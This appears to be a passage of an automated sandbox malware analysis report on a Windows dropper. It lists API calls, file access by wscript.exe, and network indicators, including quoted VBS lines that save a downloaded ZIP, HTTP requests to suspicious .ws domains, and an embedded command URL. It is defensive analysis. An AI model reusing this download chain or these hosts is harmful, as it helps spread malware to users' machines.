Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318875173.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420233729.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: bOamY.exe, 0000000F.00000003.2315769153.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407806029.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: The standard debugger class (pdb.Pdb) is an example. source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3390468057.000001E4F67DB000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317465589.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418017150.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 15_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC308E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 15_2_00007FF7ADC308E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 15_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC17790 FindFirstFileExW,FindClose, 15_2_00007FF7ADC17790
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 16_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC308E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 16_2_00007FF7ADC308E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 16_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC17790 FindFirstFileExW,FindClose, 16_2_00007FF7ADC17790
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E4471 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte, 16_2_00007FFD839E4471
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AD08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 23_2_00007FF643AD08E4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AB7790 FindFirstFileExW,FindClose, 23_2_00007FF643AB7790
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 23_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 23_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AD08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 24_2_00007FF643AD08E4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AB7790 FindFirstFileExW,FindClose, 24_2_00007FF643AB7790
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 24_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 24_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144471 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte, 24_2_00007FFD83144471
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8393E7C0 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 24_2_00007FFD8393E7C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8393E554 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 24_2_00007FFD8393E554
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 45.89.247.53 443 Jump to behavior
Potential malicious VBS script found (has network functionality)
Source: Initial file: adoStream.Write http.ResponseBody
Source: Initial file: adoStream.SaveToFile downloadPath, 2 ' Salva o arquivo ZIP
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TERASYST-ASBG TERASYST-ASBG
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: global traffic HTTP traffic detected: GET /wsx.zip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: almeidadoprogresso.siteoficial.ws
Source: global traffic HTTP traffic detected: GET /deolane.mp4 HTTP/1.1Host: estudosadulto.educacao.wsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /deolane.mp4 HTTP/1.1Host: estudosadulto.educacao.wsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://estudosadulto.educacao.ws/deolane.mp4Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TacUeuN+B6oZogU&MD=XYr7XePT HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TacUeuN+B6oZogU&MD=XYr7XePT HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /conta.php HTTP/1.1Host: pontoslivelobb.servicos.wsUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /conta.php HTTP/1.1Host: pontoslivelobb.servicos.wsUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
Source: global traffic DNS traffic detected: DNS query: almeidadoprogresso.siteoficial.ws
Source: global traffic DNS traffic detected: DNS query: estudosadulto.educacao.ws
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: pontoslivelobb.servicos.ws
Source: bOamY.exe, 00000010.00000002.3391406080.000001E4F6990000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391231364.0000018B971C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.../back.jpeg
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3389142745.000001E4F6160000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3389204732.0000018B96990000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.92.246.171:5000/replace
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED92000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B96575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl;
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6590000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96DAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6590000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96DAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crlce
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crlins
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340209765.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2339985653.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2402944871.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlY7
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlbelow
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2311107451.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 